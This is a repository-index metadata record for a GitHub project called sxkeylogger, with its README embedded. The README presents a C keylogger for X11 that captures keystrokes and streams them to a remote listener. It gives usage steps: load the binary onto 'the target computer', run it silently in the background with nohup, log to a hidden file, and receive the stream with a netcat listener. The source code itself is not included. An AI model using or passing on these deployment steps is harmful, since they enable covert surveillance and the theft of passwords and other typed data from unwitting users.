{"id":18086453,"url":"https://github.com/michaeldim02/sxkeylogger","last_synced_at":"2025-04-06T00:44:08.291Z","repository":{"id":170370698,"uuid":"646502976","full_name":"MichaelDim02/sxkeylogger","owner":"MichaelDim02","description":"Simple keylogger for X11","archived":false,"fork":false,"pushed_at":"2023-05-28T16:23:25.000Z","size":18,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"master","last_synced_at":"2025-02-12T06:57:24.976Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/MichaelDim02.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2023-05-28T15:53:47.000Z","updated_at":"2023-05-28T16:20:48.000Z","dependencies_parsed_at":null,"dependency_job_id":"b05e307f-cb6d-49be-82e0-b6c8b35613e8","html_url":"https://github.com/MichaelDim02/sxkeylogger","commit_stats":null,"previous_names":["michaeldim02/sxkeylogger"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/MichaelDim02%2Fsxkeylogger","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/MichaelDim02%2Fsxkeylogger/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/MichaelDim02%2Fsxkeylogger/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/MichaelDim02%2Fsxkeylogger/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/MichaelDim02","download_url":"https://codeload.github.com/MichaelDim02/sxkeylogger/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247419815,"owners_count":20936012,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-10-31T16:08:04.579Z","updated_at":"2025-04-06T00:44:08.285Z","avatar_url":"https://github.com/MichaelDim02.png","language":"C","funding_links":[],"categories":[],"sub_categories":[],"readme":"# sxkeylogger\nsXkeylogger is a simple network keylogger for X11 systems written in C that captures local keystrokes and sends them to a listener at a specified address \u0026 port \u0026 can also store them in a text file. This is a personal project.\n\n## Usage\nEdit the macros at the top of the source code file to configure network details. Compile with `make`.\nAfter loading the binary to the target computer, run in the background with\n```\nnohup ./a.out \u003e/dev/null 2\u003e\u00261 \u0026\n```\nYou can save stdout to a text file with\n```\nnohup ./a.out \u003e .secretfile 2\u003e\u00261 \u0026\n```\n\n### Listener\nThe keylogger will send logged information live to address \u0026 port specified in the source file before compilation. A listener device (such as a computer, an android phone with termux or a raspberry pi) will have to be listening on the specified port. To start a simple listener, you can use netcat like so:\n```\nnc -lkp $PORT\n```\n\n## Features\n* Sends keystrokes live to a listener\n* Stores keystroke on a text file\n* Resource efficient\n* Few dependencies (only X11 libary)\n* Easy to build \u0026 run\n\n## Limitations (TODO)\n* Limited keystroke capturing\n* Only works on machines running X11\n* Doesn't specify active window\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmichaeldim02%2Fsxkeylogger","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmichaeldim02%2Fsxkeylogger","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmichaeldim02%2Fsxkeylogger/lists"}